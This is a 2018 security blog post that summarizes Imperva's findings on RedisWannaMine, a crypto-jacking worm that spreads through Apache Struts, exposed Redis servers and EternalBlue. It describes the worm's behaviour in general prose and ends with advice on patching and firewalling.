• Articles
    • Editorial Articles
    • Research Articles
    • WatchGuard Articles
  • The 443 Podcast
  • Threat Landscape
  • About
    • About Us
    • Contact Us
    • Contribute to Secplicity

Secplicity - Security Simplified

Powered by WatchGuard Technologies

Crypto-jacking Is Getting Crazier by the Minute

March 16, 2018 By Abdi Hagi

Cryptocurrency

Last week, Imperva discovered a new crypto-jacking attack, which they named RedisWannaMine. According to Imperva, the malware’s initial attack vector used a well-known web application vulnerability involving Apache Struts, affecting both database servers and application servers. Imperva, however, does not reveal the scope or numbers of vulnerable systems that have been exploited. Imperva noted that most crypto-jackings thus far have been limited in their complexity, but this new attack uses a downloader that is more sophisticated. Specifically, it is more complex in both evasion techniques and capability and demonstrates a worm-like behavior exploiting the NSA EternalBlue SMB vulnerabilities together with other advanced exploits.

Imperva discovered several scripts associated with RedisWannaMine. One shell script they found, transfer.sh, was a downloader that in some ways resembled older crypto-jacking downloaders seen before. The script gains persistency in the infected host through new entry in crontab and gains remote access to the machine through a new SSH key entry in “/root/.ssh/authorized_key” and new entries in the system iptables firewall.

This downloader has many improvements over previously seen crypto-jacker downloaders though. For example, it is self-sufficient. It can install multiple packages using Linux-standard package managers such as APT and YUM. The script also downloads a publicly available TCP port scanning tool called masscan from the Github repository and then compiles and installs it on the infected host. Per the GitHub project document, masscan is “the fastest Internet port scanner tool. It can scan the entire Internet in under 6 minutes, transmitting 10 million packets per second.”

According to the research, once the malware gets settled on the host, the script then launches another process that uses the masscan tool to discover and infect publicly available Redis servers. The tool scans for TCP port 6379 both on public and private IPs. If any of the IP addresses scanned is publicly available, the script then launches the ‘redisrun.sh’ script to infect the new host with the same crypto-mining malware and repeats the trend.

RedisWannaMine also uses the EternalBlue SMB exploits against vulnerable Windows servers. The malware process launches another scan process called ‘ebscan.sh’ that again uses the masscan tool, this time for TCP port 445 on both private and public IPs to discover and infect publicly available Windows servers running vulnerable SMB versions.

According to the Imperva blog post, the miner uses a well-known crypto-miner malware to mine cryptocurrency and funnel it to the hacker-owned wallet.

How do you prevent RedisWannaMine?

There are several ways to prevent RedisWannaMine from infecting your servers. At a minimum, install system updates and properly patch applications with the latest security updates. Making sure vulnerable protocols like old SMB versions are disabled in your network and using firewalls to restrict access so that servers like Redis are not exposed to the world can go a long way, too. For more information on this particular attack, you can view Imperva’s blog here. –Abdi Hagi

Share This:

Related

Filed Under: Editorial Articles Tagged With: Hacking, Infosec news

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

The 443 Podcast

A weekly podcast featuring the leading white-hat hackers and security researchers. Listen Now
the 443 podcast

Threat Landscape

Filter and view Firebox Feed data by type of attack, region, country, and date range. View Now
threat landscape

Top Posts

  • US National Cybersecurity Strategy
  • Cybersecurity News: Free Cybersecurity Training, TrickBot Group Exposed, Major GoDaddy Breach, and Russia to Legalize cybercrime?!
  • Here Come The Regulations
  • Successfully Prosecuting a Russian Hacker

Email Newsletter

Sign up to get the latest security news and threat analysis delivered straight to your inbox

By signing up you agree to our Privacy Policy.


The views and opinions expressed on this website are those of the authors and do not necessarily reflect the policy or position of WatchGuard Technologies.

Stay in Touch

Recent Posts

  • Cybersecurity News: LastPass Incident Revealed, White House Issues Cybersecurity Strategy, FBI Purchases Leaked USHOR PII Data, and a Slew of Other Breaches
  • An Update on Section 230
  • Here Come The Regulations
  • US National Cybersecurity Strategy
  • Cybersecurity News: Free Cybersecurity Training, TrickBot Group Exposed, Major GoDaddy Breach, and Russia to Legalize cybercrime?!
View All

Search

Archives

Copyright © 2023 WatchGuard Technologies · Cookie Policy · Privacy Policy · Terms of Use